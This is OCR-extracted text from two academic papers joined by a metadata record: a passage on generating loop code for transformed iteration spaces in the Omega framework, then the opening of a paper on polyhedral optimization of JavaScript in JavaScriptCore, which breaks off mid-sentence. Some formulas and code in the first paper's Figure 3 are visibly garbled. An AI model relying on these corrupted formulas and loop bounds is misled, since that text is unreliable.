\(t_2\), and so on. We build the initial AST in a depth-first fashion. At each stage of this construction process, we try to find a suitable condition \(c\) on which to split the range of values of the next index variable \(t_k\). The idea is that generating two tighter loops for this index variable, rather than one looser loop, will allow us to eliminate some more deeply nested source of control overhead. However, the initial AST must not produce any code duplication, so these split conditions must be chosen such that the new ranges will have disjoint, non-empty sets of active statements. A statement is active if it possesses an iteration that needs to be executed in the branch of the AST currently being constructed. For each active statement, we compute the constraints on \(t_k\) for iterations of that statement in terms of \(t_1, \ldots, t_{k-1}\). We then check to see if any of these constraints satisfy the above requirements. If such a condition \(c\) exists, we generate a split node with \(c\) as the condition, and calculate the set active statements for each branch. If necessary, we adjust \(c\) so that values of \(t_k\) that satisfy it are less than those that do not. We then recursively determine the structure of the child nodes. If no such \(c\) exists, then there is no way to further partition the range of \(t_k\) without duplicating code. So, we generate a loop node here for \(t_k\) (making \(t_{k+1}\) the next index variable). After loops have been generated for each index variable, we generate a leaf node. ### 5 Evaluating node attributes In this section we describe how to augment the AST with more detailed information regarding the conditions and loop bounds of the conditionals and loops. --- **Original code** ```plaintext``` for k = 1 to n for i = k+1 to n s(i,k) = s(i,k) / s(k,k) for j = k+1 to n s(i,j) = s(i,j) - s(i,k) * s(k,j) ``` **Mapping** \[T_1: \{(i, j) \mid 64(k-1) ≤ 64(i\ div 64), k, i)\}\] \[T_2: \{(i, j) \mid 64(k-1) ≤ 64(i\ div 64), j, k, i)\}\] **New Iteration Space**:\n \[I_1: \{[t_1, t_2, t_3, t_4, t_5] \mid 64 \land t_3 ≤ t_1 \leq t_3 \leq t_3 \leq t_2 + 63, n ≤ t_2 \land t_4 = t_5\}\] \[I_2: \{[t_1, t_2, t_3, t_4, t_5] \mid 64 \land t_4 ≤ t_3 \leq t_1 \leq t_4 \leq t_2 + 63, n \leq t_2 \land t_3 ≤ t_4 \}\} **Initial AST** ![Initial AST Diagram] **Code corresponding to the initial AST** ```plaintext``` if 2^n = n then for t1 = 1 to n-1 step 64 for t2 = t1+1 to n step 64 for t3 = t1 to n if t1 < t3 then for t4 = t1 to min(t2+63, t2+63, t3-1) for t5 = max(t2, t4+1) to min(t2+63, n) s2[t4, t5, t3] if t3 < t1+63 and t3 < t1+63 and t3 < n-1 then for t5 = max(t2, t4+1) to min(t2+63, n) s1[t3, t5] ``` **Figure 3: Initial blocked LU decomposition** Given the original program and a set of mappings, our first step is to compute the new iteration spaces belonging to each of the statements. We restrict... Generate Initial AST (T, old IS) INPUT: - old IS : array [maxStmts] of TupleSet, old IS[p] is the iteration space of statement p in the original code of the statements. OUTPUT: - An AST node which is the root of the tree which represents the structure of the code. ALGORITHM: foreach statement s new IS[s] = range (restrict domain (T[s], old IS[s])) for L = 1 to last_level I[s, L] = project (new IS[s], 1...L) return Partition (1, [all stmts]) Partition (level, active, I) INPUT: - level : integer, Loop levels 1, ..., level - 1 have already been generated and should be considered fixed. - active : set of statement, The statements for which code should be generated - I : array [maxStmts,max Levels] of TupleSet, I[s,L] is the new iteration space of statement s projected onto symbolic constants and index variables at levels 1...L. OUTPUT: - An AST node which is the root of the tree which represents the structure of the code. ALGORITHM: if level = last_level then return AST_Leaf ( ) if \( \exists \) constraint \( c \in I[s, level] \), for some \( s \), s.t. active1 \( \neq \emptyset \land \) active2 \( \neq \emptyset \land \) active1 \( \cap \) active2 = \( \emptyset \) where active1 = \( \{ s : s \in active \land \{ c \} \cap I[s, level] \) is satisfiable \} and active2 = \( \{ s : s \in active \land \{ \neg c \} \cap I[s, level] \) is satisfiable \} then return AST_Split (level, c, Partition (level, active1, I), Partition (level, active2, I)) else return AST_Loop (level, Partition (level+1, active, I)) Figure 4: Algorithm to construct the initial AST respectively. This information is initially used to identify sources of control overhead (see Section 7), and later to generate the actual code (see Section 6). This algorithm is performed on the initial AST and later on the sub-trees of the AST that are modified by the optimization phase. The algorithm is given in Figure 5 and is explained below. The algorithm performs a depth-first traversal of the AST, evaluating attributes of the nodes as it goes. As we move down the tree we maintain two tuple sets: restrictions and known. The tuple set restrictions contains all constraints from split nodes between the current node and nearest loop node above. The tuple set known contains all constraints enforced by conditionals and loop bounds above the current node. These tuple sets define the current context; that is, the subsets of the iteration spaces that the code corresponding to the current sub-tree will have to iterate over. We wish to maintain the property that for every split node, both subtrees represent at least one iteration of some statement. So, when we come to a split node, we check that such iterations exist, and if not, we remove the split node, replacing it with the appropriate child node. In evaluating a loop node at level l, we compute three things: the statements that should be executed in the loop body, the conditions under which the loop should be executed, and the values of the current index variable \( t_b \) the loop should enumerate. We first determine which statements will need to be executed in that loop (those whose iteration spaces intersect \( \text{restrictions} \cap \text{known} \)). Given that set of statements, and the constraints in \( \text{known} \) and \( \text{restrictions} \), we want to find the strongest conditional and the tightest loop bounds that will not exclude any iterations in those statements’ iteration spaces. Any constraints in \( \text{restrictions} \) can be enforced, since any iterations a given constraint excludes will be included in the other subtree of that con- **Evaluate** (node, known, restrictions) **INPUT:** - node: AST.node, the root of the subtree to be evaluated - known: TupleSet, constraints on index variables and symbolic constants that have been represented in above loop nodes - restrictions: TupleSet, constraints on the current index variable that specify the region whose subtree is being evaluated **OUTPUT:** - This function computes tuple sets that represent the guards and loop bounds for loop nodes and guards for the leaf nodes. **ALGORITHM:** ```plaintext if (node.type == AST_split) if (∃ statement s s.t. I[s, node.level] ∩ known ∩ restrictions ∩ node.condition is satisfiable) remove node and replace it with node.false_side Evaluate (node.false_side, known, restrictions) else (¬∃ statement s s.t. I[s, node.level] ∩ known ∩ restrictions ∩ ¬node.condition is satisfiable) remove node and replace it with node.true_side Evaluate (node.true_side, known, restrictions) else Evaluate (node.true_side, known, restrictions ∩ ¬node.condition) Evaluate (node.false_side, known, restrictions ∩ node.condition) elseif (node.type == AST_loop) foreach statement s active[s] = (I[s, node.level] ∩ restrictions ∩ known) is satisfiable bounds = \text{convex hull}(\bigcup_{i \in \text{active}[s]} I[s, node.level]) ∩ known ∩ restrictions ∩ \text{greatest common step}(active, node.level, I) needsCheck = gist(bounds, known) node.guard = \text{project}(needsCheck, 1\ldots node.level-1) node.loop = gist(needsCheck, guard) Evaluate (node.child, bounds, True) elseif (node.type == AST_leaf) foreach statement s node.guard[s] = gist(new I[s] ∩ restrictions ∩ known, known) ``` --- Figure 5: Evaluate Algorithm We want to add further constraints on \( t_k \) so that the loop only iterates over those points for which at least one iteration of some statement is executed. For example, consider the two iteration spaces: \[ I_1 = \{i | 1 \leq i \leq 5\} \\ I_2 = \{i | -1 \leq i \leq 10\} \] Unless we enforce the constraints \( 1 \leq i \) and \( i \leq 10 \), the loop would iterate over points (such as \( i = 11 \)) which do not correspond to an iteration of any statement. However, if we were to add the constraint \( i \leq 5 \), which is not on the convex hull of the union of the two spaces, we would erroneously excluding required iterations of statement 2 (\( 6 \leq i \leq 10 \)). There are also some non-convex constraints that we can enforce. We collect together all stride constraints of the form \( \exists \beta \text{ s.t. } t_k = a_p\beta + b_p \) (where \( a_p \) is an integer coefficient and \( b_p \) is an affine function of symbolic constants and outer level index variables) that are associated with statements in the loop. We then calculate the *greatest common step* of the loop as follows: \[ gcs = \gcd\{a_p | s_p \text{ is active}\} \cup \{\gcd(b_q - b_p) | s_q \text{ is active and } s_p \text{ is active}\} \] The gcd of an expression is defined to be the gcd of the coefficients in the expression. We can enforce the constraint \[ \exists \beta \text{ s.t. } t_k = gcs \beta + b_p \] where \( s_p \) is an arbitrary statement in the loop, by making \( gcs \) the loop step and suitably modifying the lower bound so that it satisfies this constraint. The loop step may not enforce all of the stride constraints on statements in the loop, but we cannot add anything stronger without excluding required iterations. Any remaining stride constraints will be enforced later. To construct the full set of constraints to be enforced at the loop, we intersect the convex hull of the active statements’ iteration spaces with known restrictions, and the greatest common step. We use the gisf operation to remove any constraints that are implied by known and thus will be enforced at earlier loop nodes. Once we have determined which constraints can be enforced at this point, we divide them into those that can be enforced in the conditional statement and those that must be enforced by the for loop. To evaluate a leaf node we determine which atomic statements will need to be executed. For each statement that needs to be executed, we calculate the constraints for its iteration space that are not implied by the surrounding loops and conditionals. 6 Generating code from an AST Generating code in a high-level language is straightforward once we have evaluated the attributes of the AST. The algorithm performs a depth first traversal of the AST, generating the code as it goes. When we come to a split node, we generate code for the true child and then generate code for the false child. We do not generate a conditional statement at this point; rather, it is the responsibility of the code generated for the child nodes to execute only the appropriate iterations. When we come to a loop node we generate a for loop and possibly a conditional statement around that for loop. In the case where we can prove that at most one iteration can execute, we can avoid generating a loop. If the condition attribute of the loop node is not a tautology then an if statement is generated to check this condition. Generating the for loop from the bounds attribute of the loop node is slightly more complicated, since the semantics of for loops are not defined in terms of (multiple) lower bounds, (multiple) upper bounds and stride constraints. Instead, they are defined in terms of an initial value, a single bound and a step (the bound is either an upper or lower bound, depending on the sign of the step). Since the code we generate enumerates the iteration space in lexicographical order, we need only consider positive steps. We now need to calculate the initial value: the smallest integer that satisfies both the lower bounds and the stride constraint. Assume that we have a lower bound of the form \( L \leq m t_k \), where \( L \) is a function of outer loop index variables and symbolic constants and \( m \) is an integer coefficient. If there is no stride constraint, the initial value implied by this lower bound is \( \text{CeilDiv}(L, m) \), where \( \text{CeilDiv}(a, b) \) is a function that computes \( \lceil a/b \rceil \). If there is a stride constraint of the form \( \exists \beta . s . . t_k = c + s \beta \), the step will be \( s \) and the smallest integer that satisfies both the lower bound and the stride constraint is \( \text{CeilDiv}(\text{CeilDiv}(L, m) - c, s) * s + c \). In a number of cases, we can generate simpler formulas. For example we can generate simpler formulas when \( m = 1 \) or when we can determine that \( \text{CeilDiv}(L, m) \) is always a solution to the stride constraint. For space reasons, we do not detail these here. Finally, we convert multiple upper or lower bounds into a single lower or upper bound using \( \max \) or \( \min \) as appropriate. When we come to a leaf node we generate code in turn for each active statement. If the guard attribute for a statement is not a tautology then a conditional statement is generated to test this condition. The statements themselves are unchanged from the original program, except that the old index variables are replaced by appropriate functions of the new loop variables. Since the mapping is one-to-one, these functions can be easily determined by simply inverting the mapping. --- PrintNode (node) INPUT: node : AST\_node, the node for which we are generating code. OUTPUT: for loops and if statements to execute the AST ALGORITHM: if (node\.type == AST\.split) PrintNode (node\.left) PrintNode (node\.right) elseif (node\.type == AST\.loop) if (node\.guard is not Tautology) print iF then (node\.guard) print Loop (node\.level, node\.loop) PrintNode (node\.child)) elseif (node\.type == AST\.leaf) foreach statement s if (node\.guard[s] is Satisfiable) if (node\.guard[s] is not Tautology) print iF then (node\.guard) print statement (s, T[s]) Figure 6: Print Code Algorithm 7 Optimizing the code structure Having generated an initial AST that does not duplicate code, we now consider optimizations that reduce execution time overhead at the cost of an increase in code size. We consider three types of overhead in our implementation: guards around loops, guards around atomic statements, and min’s and max’s in loop bounds. Zero trip loops are also a potential source of overhead; we generate guards to ensure that loops have at least one iteration, so this problem reduces to the case of guards around loops. We remove overhead as follows: 1. Find an overhead we wish to remove. 2. Determine a constraint that, if tested, would allow us to eliminate the overhead. 3. Create a new split node that tests that constraint, with the code containing the overhead duplicated under both branches of the split. Our optimization criteria is the maximum number of loops $k_{max}$ that we will allow to surround a source of overhead. Roughly speaking, the cost of an overhead nested inside of $d$ loops will be $O(n^d)$, where $n$ is the number of iterations of a loop. We could use more exact methods [17] to evaluate the cost of an overhead. However, the cost of such analysis is probably not worthwhile and would be of questionable benefit (e.g., it is not clear whether it is better to remove a source of overhead executed $mn(n-1)/2$ times or a source executed $m^2n$ times). If a code fragment executes $O(n^d)$ necessary operations, then executing $O(n^d)$ avoidable overhead is probably unacceptable. Reducing the avoidable overhead to $O(n^{d-1})$ will probably be acceptable in this situation and any further reduction may be unnoticeable. We are able to dynamically control the amount of overhead that we eliminate based on the amount of code explosion seen so far. Given an AST with loops nested $d$ deep, we first remove overhead nested within $d$ loops. We next remove overhead nested within $d-1$ loops, and so on, until all overhead nested inside $k_{max}$ loops is eliminated. To remove all overhead nested $k_{max}$ deep, we first traverse down the AST to each loop nested $k_{max}$ deep. Note that in counting nesting depth, we only count loop nodes that require a loop to be generated (i.e., that contain more than one iteration). Upon reaching a loop nested $k_{max}$ deep, we need to lift out all overhead from the body of that loop. We search the body of the loop for a constraint that would eliminate some source of overhead. We then generate a split node on that condition, place copies of the original loop node under both branches of the split node, and attempt to remove overhead from both branches. We only extract one constraint at a time and then reevaluate using the algorithm described in Section 5. Testing one constraint might eliminate the need to test another constraint in one of the two branches (e.g., both $i \leq 10$ and $i \leq 20$ might remove overhead, but $i \leq 20$ would not need to be tested in the true branch of a split on $i \leq 10$). Finding constraints that eliminate overheads is fairly straightforward. All guards of atomic statements and loops are sources of overhead and can easily be located by examining the guard attributes of loop and leaf nodes. For loop nodes, we also can check to see if the bounds contain multiple lower bounds or multiple upper bounds. If so, it is straightforward to generate the constraint that eliminates the overhead (e.g., testing $a \leq b$ will eliminate the overhead of computing $\min(a, b)$). Table 1 shows the optimized AST and corresponding code for the example introduced in Figure 4, with all overhead inside four or more loops removed. Table 1 shows the overhead (as a percentage of original code time) and code size for different levels of overhead optimization. The blocked version contains more overhead than the original, unblocked code, since it adds extra loops for the blocking. The line marked “Naive” is for comparison only; we do not generate that code. The naive code is a set of loops scanning the convex hull, with all remaining conditions checked as innermost guards. The optimized code for $k_{max} = 4$ is identical to the initial case, since there are no overheads nested inside 5 loops in the initial code. The results here do not include cache effects, so we can measure the overhead directly. At higher levels of optimization, the code size increases dramatically, with diminishing performance gains. In this example, removing control overhead located inside more than 3 loops ($k_{max} = 3$) is probably sufficient. Optimized AST \begin{figure} \centering \includegraphics[width=\textwidth]{optimized_ast.png} \caption{Optimized block decomposition} \end{figure} 8 Related work The problem of generating code for a convex region was first addressed by Ancourt and Irigoin [1]. They use Fourier pairwise elimination at each level to provide bounds on each of the index variables. They then form the union of all of these projections to produce a single set of constraints which explicitly contains all of the information necessary to generate code. They propose that fast inexact techniques be used to remove redundancies from this set before it is used to generate code. They consider only the single mapping convex case. Li and Pingali [15] consider the non-convex case resulting from mappings that are not necessarily onto. They use a linear algebra framework and compute loop bounds and steps using Hermite normal form. They do not consider the multiple mapping case. Ayguadé and Torres [2] consider a limited case of the multiple mapping case where each statement can have a potentially different mapping but all mappings must have the same linear part (i.e., they only differ in their constant parts). Chamski [4, 5] generates Nested Loop Structures, which are similar to our AST. He discusses generating code only for the single mapping convex case. He reduces control overhead by generating sequences of loops to remove all min and max expressions in loop bounds. The cost of code duplication may be large when all such overheads are removed. We are able to eliminate control overhead from sources other than min’s and max’s and we selectively decide which overheads to eliminate by considering both the amount of control overhead and the amount of code duplication that would occur. Chamski claims [4] that Fourier variable elimination is prohibitively expensive for code generation. We have found it to be a very efficient method, and suspect he used unrealistic examples and/or a poor implementation of Fourier variable elimination. It is well known that Fourier variable eliminate performs poorly on moderate to large systems of constraints where the constraints are dense: each constraint involves many variables. However, the constraints we have seen in both dependence analysis and code generation are quite sparse, and Fourier elimination is quite efficient for sparse constraints [19]. Collard, Feautrier and Risset [7] show how PIP, a parametrized version of the Dual Simplex Method, can be used to solve the simple case. Collard and Feautrier [6] address the multiple mapping case; however, only one dimensional iteration spaces are considered and many guards are generated. They provide some interesting solutions to the situation where statements have incompatible stride constraints (e.g., \( t_1 \) is even and \( t_1 \) is odd). Stride constraints such as this arise frequently in Feautrier’s parallelization framework [9, 10], while we [13, 11] try to avoid them in our framework, since generating good code for them is difficult. 9 Conclusion We have presented an algorithm to generate transformed code from the original code and a set of one-to-one statement mappings representing the transformation. Unlike most previous systems, our system can generate efficient loop structures even when a potentially different mapping is used with each statement and the resulting union of iteration spaces is non-convex. Our algorithms permit optimizations of the control overhead that results from non-convexity, and allows the user to trade-off lower overhead for code duplication. This approach to generating code and the optimization we describe are particularly important for loop interchange or loop blocking of imperfectly nested loops. 10 Implementation and availability An implementation of this algorithm is available in the Omega Calculator. The Omega Calculator and copies of our other papers are available from http://www.cs.umd.edu/projects/omega and ftp://ftp.cs.umd.edu/pub/omega. References
{"Source-Url": "http://drum.lib.umd.edu/bitstream/handle/1903/651/CS-TR-3317.1.pdf;jsessionid=06E9502C62C2AA28B2BC3F0FE88594EB?sequence=2", "len_cl100k_base": 8880, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 43132, "total-output-tokens": 10645, "length": "2e13", "weborganizer": {"__label__adult": 0.00035500526428222656, "__label__art_design": 0.00030422210693359375, "__label__crime_law": 0.00035119056701660156, "__label__education_jobs": 0.0004925727844238281, "__label__entertainment": 5.6803226470947266e-05, "__label__fashion_beauty": 0.00016820430755615234, "__label__finance_business": 0.00027751922607421875, "__label__food_dining": 0.0003838539123535156, "__label__games": 0.0007205009460449219, "__label__hardware": 0.001773834228515625, "__label__health": 0.00054931640625, "__label__history": 0.00023555755615234375, "__label__home_hobbies": 0.00015103816986083984, "__label__industrial": 0.0005946159362792969, "__label__literature": 0.00019049644470214844, "__label__politics": 0.00028133392333984375, "__label__religion": 0.0005154609680175781, "__label__science_tech": 0.0241546630859375, "__label__social_life": 6.496906280517578e-05, "__label__software": 0.004131317138671875, "__label__software_dev": 0.962890625, "__label__sports_fitness": 0.0004055500030517578, "__label__transportation": 0.0007495880126953125, "__label__travel": 0.0002357959747314453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41826, 0.02372]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41826, 0.47538]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41826, 0.86815]], "google_gemma-3-12b-it_contains_pii": [[0, 929, false], [929, 4505, null], [4505, 9180, null], [9180, 13517, null], [13517, 17471, null], [17471, 21208, null], [21208, 24675, null], [24675, 29184, null], [29184, 33746, null], [33746, 36695, null], [36695, 41826, null]], "google_gemma-3-12b-it_is_public_document": [[0, 929, true], [929, 4505, null], [4505, 9180, null], [9180, 13517, null], [13517, 17471, null], [17471, 21208, null], [21208, 24675, null], [24675, 29184, null], [29184, 33746, null], [33746, 36695, null], [36695, 41826, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41826, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41826, null]], "pdf_page_numbers": [[0, 929, 1], [929, 4505, 2], [4505, 9180, 3], [9180, 13517, 4], [13517, 17471, 5], [17471, 21208, 6], [21208, 24675, 7], [24675, 29184, 8], [29184, 33746, 9], [33746, 36695, 10], [36695, 41826, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41826, 0.06522]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
5cc72f6c0d3a688ef05e04cc376620ff29d4716b
Abstract The JavaScript language was originally designed to help writing small scripts adding dynamism in web pages. It is now widely used, both on the server and client sides, also for programs requiring intensive computations. Some examples are video game engines and image processing applications. This work focuses on improving performance for this kind of programs. Because JavaScript is a dynamic language, a JavaScript program cannot be compiled efficiently to native code. For achieving good performance on such dynamic programs, the common implementation strategy is to have several layers handling the JavaScript code, starting from interpretation, up to aggressive just-in-time compilation. Nevertheless, all existing implementations execute JavaScript functions using a single thread. In this work we propose to use the polyhedral model in the just-in-time compilation layer to parallelize compute-intensive programs that include loop nests. We highlight what are the scientific challenges, resulting from the dynamism of the language, for integrating automatic polyhedral optimization. We then show how to solve these challenges in the JavaScriptCore implementation of Apple. Keywords JavaScript, Engine, Automatic parallelization, Polyhedral Optimization, Just-in-time compilation. 1 Introduction JavaScript is a high level, prototype-based, object-oriented, dynamic language. Strictly speaking, JavaScript is not the specification of the language itself, but the initial language and its implementation developed by Netscape. The standard name for the language is ECMAScript whose first version was released in June 1997 and the last one in June 2017. For simplicity purposes and to use the widespread “wrong” term as anywhere else, we will refer in the following to JavaScript instead of ECMAScript to mention the language itself. Because JavaScript is a dynamic language, a JavaScript source program cannot be compiled efficiently to native code. Instead, JavaScript programs are handled by a JavaScript implementation referred to as JavaScript engine in the following. This engine is in charge of executing the JavaScript source program given as input. JavaScript was used historically on the client web-browser side to enable dynamic web pages. A large number of applications are now using JavaScript also for running compute-intensive tasks such as image processing routines or video games engines. JavaScript is also now widely used as server side language. Because of its widespread usage, all the major internet companies and open source communities have their own JavaScript engine. Google has its V8 Engine [6], Apple has JavaScriptCore [2], Mozilla has SpiderMonkey [16] and Microsoft has Chakra [15]. For many years, these companies and open source communities have optimized their engines in the context of the so-called “browser war”. To efficiently execute JavaScript programs, all these engines use a layered approach often starting from interpretation of JavaScript source code and ending in aggressive just-in-time compilation to native code. Surprisingly, even if the engines themselves are parallel applications, none of them are able to execute JavaScript code in parallel. The sequential nature of the language itself is probably one explanation. In other words, because the language does not allow to express parallelism and because of the dynamism it provides, it is very challenging to identify and exploit parallelism in JavaScript applications. Even if none of the widespread JavaScript engines mentioned above are able to execute JavaScript code in parallel, recent researches have started to study this question [9, 13, 14, 17]. Relying either on speculation, language extensions or on automatic loop parallelization, these proposals have shown that parallelism can be exploited in JavaScript benchmarks and real applications. Independently of JavaScript, the polyhedral model [5] has proven to be very useful to optimize and parallelize compute intensive application kernels written in non dynamic languages such as C. More recently, polyhedral optimization has also been applied by just-in-time compilers [11, 12, 19]. In the latter case, the optimization and parallelization are performed dynamically during the execution of the application. Motivated by these first results regarding JavaScript parallelization and by the growing usage of polyhedral tools in just-in-time compilers, we study in this work the possibility of using the polyhedral model for automatic optimization and parallelization of JavaScript. As we show in the paper, the main challenges are related to the management of the dynamism allowed by the language. The growing usage of JavaScript for compute-intensive applications is a motivating indicator for the application of polyhedral optimization. In this work, we make the following contributions: - Identification of scientific challenges to integrate polyhedral optimization in JavaScript; - Proposition of solutions for these challenges in the context of a state-of-the-art JavaScript engine; - Demonstration of the benefits of doing polyhedral optimization on a matrix multiplication JavaScript kernel; - Identification of perspectives allowing to handle more JavaScript programs with the polyhedral model. The rest of the paper is organized as follows. Section 2 describes the architecture of a layered JavaScript engine along with some basics regarding the polyhedral model. Section 3 presents the scientific challenges that must be handled to enable polyhedral optimization in a layered JavaScript engine. Section 4 proposes solutions for these challenges. Section 6 presents preliminary results on a matrix multiplication kernel. Finally, Sections 7 and 8 present related work and conclude this preliminary work. # 2 Background And Objective JavaScript is a very dynamic language. This dynamism has a strong impact on the way JavaScript programs are executed. The language allows to dynamically load piece of code during execution. This feature itself is hardly compatible with static compilers. Static compilation is also not an optimal solution because of the lack of information in the source code, e.g., no type information. For these reasons, JavaScript programs are executed by a JavaScript engine. This engine handles dynamism and can offer good performance by observing the execution of the program and then by optimizing it based on its observation. Using the polyhedral model in the context of JavaScript implies to take into account this dynamism. This section gives an overview of what kind of dynamism is allowed by JavaScript, before describing how state-of-the-art JavaScript engines handle it. Finally, a brief introduction of the polyhedral model is given. ## 2.1 JavaScript Dynamism To illustrate several forms of dynamism of JavaScript, let us consider the simple function shown in Figure 1. ```javascript f(img, width, height) { for (var i = 0; i < width; i++) { for (var j = 0; j < height; j++) { var v = img[i*width + j]; v = v + 41; v = v * 7; img[i*width + j] = v; } } } ``` **Figure 1.** Simple JavaScript function iterating over an image. is located the property `i*width + j` of the `img` parameter. Then the engine must look what is the meaning of the `+` and `*` operators for the `v` variable, according to its type. Another important concern for engines, revealed indirectly by this example, is JavaScript numbers. From the programmer point of view, the specification tells that numbers are all double precision floating point numbers. This has a strong impact on the performance of the engine that must implement such semantics. Nevertheless, JavaScript engines use cheap 32 bits integer instructions when programs manipulate small integer values. But because JavaScript numbers must behave as double precision floating point numbers, using 32 bits integer instructions is semantically correct only if the numbers fit in 32 bits. As a consequence in our example, considering that `img` contains only integers, the engine has to check that `v` fits in 32 bits when using the processor 32 bits integer instructions to perform the `+` and `*` operations. The language is also very permissive regarding arrays. This is not shown in our example, but in JavaScript, it is possible to write outside the bounds of an array. For example, a function scaling up an image could have statements writing outside the image. In this case, the semantics of the language is to extend the array up to the index that has been written. Slots in the array between the previous last element and the one just written are then considered as holes. ## 2.2 Layered JavaScript Engine For efficiently handling all forms of dynamism present in the language, all JavaScript engines rely on a layered architecture [6, 15, 16]. Figure 2 depicts the architecture of JavaScriptCore [2], the engine that we use in this work. JavaScriptCore is a state-of-the-art JavaScript engine developed by Apple and used in the WebKit project. Webkit being itself used, among other, by the Safari web browser. Depending on the engine itself, some of the layers depicted on this figure may not be present, but the global architecture is the same for all the JavaScript engines in use. These engines work on a function basis. Each time a function is called, it is executed by a given layer depending on the context. The main idea is to execute the time consuming functions in the most efficient layers, in which the engine can afford to spend time for optimizing. ![Diagram of JavaScriptCore's layered architecture](image) **Figure 2.** The layered architecture of JavaScriptCore. We now describe this layered architecture by showing how our example function of Figure 1 is handled, focusing on the + and * operators. The first time the engine must execute a given function, it compiles it to its own bytecode representation. Then the function is handled by the first layer, an interpreter, whose source code can be summarized in a simplified way by the code depicted in Figure 3. As already mentioned, the interpreter must take care of the types of the operands and dispatch to the appropriate implementation. Then, on some next invocation or inside the current invocation of the function, the engine may decide to switch to the next layer, labeled Baseline JIT in Figure 2. This layer compiles the function bytecode to native code. This is done in a very naive way by replacing each bytecode instruction with the corresponding assembly sequence of the interpreter. Figure 4 shows the generated binary code for the two consecutive instructions that compute the new value of \( v \) in our example function. This first compilation step removes the overhead of dispatching instructions. In the generated code, compared to the interpreter, there is no more any switch on the type for the current instruction. Then, again on some next invocation of the function or inside the current invocation of the function, the engine may decide to switch to the next layer called DFG (DataFlow Graph) JIT. Compared to the interpreter and the Baseline JIT layers, the execution enters the speculative part of the JavaScript engine. In this layer, JavaScriptCore relies on assumptions made by looking at profiling information gathered by the previous layers. This profiling information contains for example the effective types that have been encountered up to now. Considering that our function has been only called with arrays of integers fitting on 32 bits, JavaScriptCore creates a new representation of the program taking into account this information, as shown in Figure 5. In the case of speculation failing, JavaScriptCore must go back to the last non speculative layer in order to correctly execute the function according to the JavaScript semantics. Starting from this new representation, that does no more contain any instruction devoted to handling the dynamism, typical compiler optimization may be performed, before generating... new native code far more efficient than the one generated by the naive Baseline JIT layer. ```javascript f(img, width, height) { if (img is array of 32 bits integers) { for (var i = 0; i < width; i++) { for (var j = 0; j < height; j++) { var v = img[i*width + j]; v = v->as_int() + 41; v = v->as_int() * 7; img[i*width + j] = v; } } } else { return to Baseline JIT; } } ``` Figure 5. Internal representation of the DFG JIT speculative layer for the example function. Finally, the FTL JIT layer which is also speculative, consist in applying more aggressive and thus more time consuming transformations. To that end, JavaScriptCore compiles the dataflow graph intermediate representation to LLVM-IR and then to native code. Using LLVM allows to leverage most of its transformations and its backend. The general idea of this design is to remove as much dynamism as possible by profiling the code behavior. Final layers can then apply aggressive optimization since they do not need to handle dynamism. In case of bad predictions, the execution rollbacks to the first layers. Existing JavaScript engines are not able to execute JavaScript code in parallel. Said differently, the interpreter code and the different versions of native code generated dynamically are all sequential. Nevertheless, the just-in-time compilation process itself is often done in parallel of the execution in the previous layer. Other tasks of the JavaScript engine, e.g., garbage collection, are also done in parallel in existing engines. 2.3 The Polyhedral Model The polyhedral model [5] is a mathematical model devoted to the analysis and transformation of loop nests. In order to be optimized by the polyhedral model, a loop nest must be compliant with what is called a Static Control Part (SCoP). A SCoP is a loop nest where loop bounds, memory accesses and branches conditions are all affine functions of parameters constant in the nest and of enclosing loop iterators. Based on this model, classical loop transformations such as skewing, interchange and others can be expressed in a common simple formalism. Historically, polyhedral tools were implemented as source-to-source compilers. More recently, polyhedral optimization have been implemented at the level of compilers intermediate representations. It has been successfully deployed in production compilers such as GCC and LLVM respectively by the GRAPHITE [20] and the Polly [7] frameworks. The main challenges for performing optimization on intermediate representation are the identification of SCoPs and the granularity choice of what would be considered as a schedule unit by the polyhedral optimizer, i.e., a statement in the polyhedral terminology. In this work, we do not address these challenges but rely on existing proposals and tools. The addressed challenges are related to the objective of having the JavaScript engine last optimization layers generating code which can be handled by polyhedral tools. 2.4 Objective The final objective of this work is to integrate polyhedral optimizations in JavaScript engines. This can only be done in the last speculative layer of the engine, when the dynamism has been entirely removed, such that the code is in the closest shape to what can be handled by polyhedral tools. To reach this goal, we present in this paper what are the challenges to merge both the world of advanced static optimization and the world of just-in-time compilation for a dynamic language such as JavaScript. 3 Challenges For Polyhedral Optimization Of JavaScript Programs This section brings to light the challenges for integrating polyhedral optimization inside a JavaScript engine to generate native code that is more efficient than the one generated by state-of-the-art engines. Additional performance comes from parallelization and data locality optimization provided by the polyhedral model. In Section 4, we propose solutions to these challenges in the context of the JavaScriptCore engine developed by Apple. 3.1 Issue 1: SCoPs Detection As stated in Section 2.3, the first challenge of polyhedral tools working on intermediate representations is to identify SCoPs. In the context of intermediate representation generated by a JavaScript engine, this detection is made even more difficult because of the shape of the code. This code is quite different from the one generated by front-ends for static languages such as C or C++. 3.1.1 Single Entry Single Exit Regions Section 2.3 introduced the three constraints a loop nest must satisfy to be a SCoP. The constraint on the conditionals leads to the fact that the control flow of the loop must be statically known. In practice, polyhedral tools operating on intermediate representations add the constraint that the loop nest must form a Single Entry Single Exit (SESE) region. This means that all the basic blocks of the loop nest must be in a region of code with only one 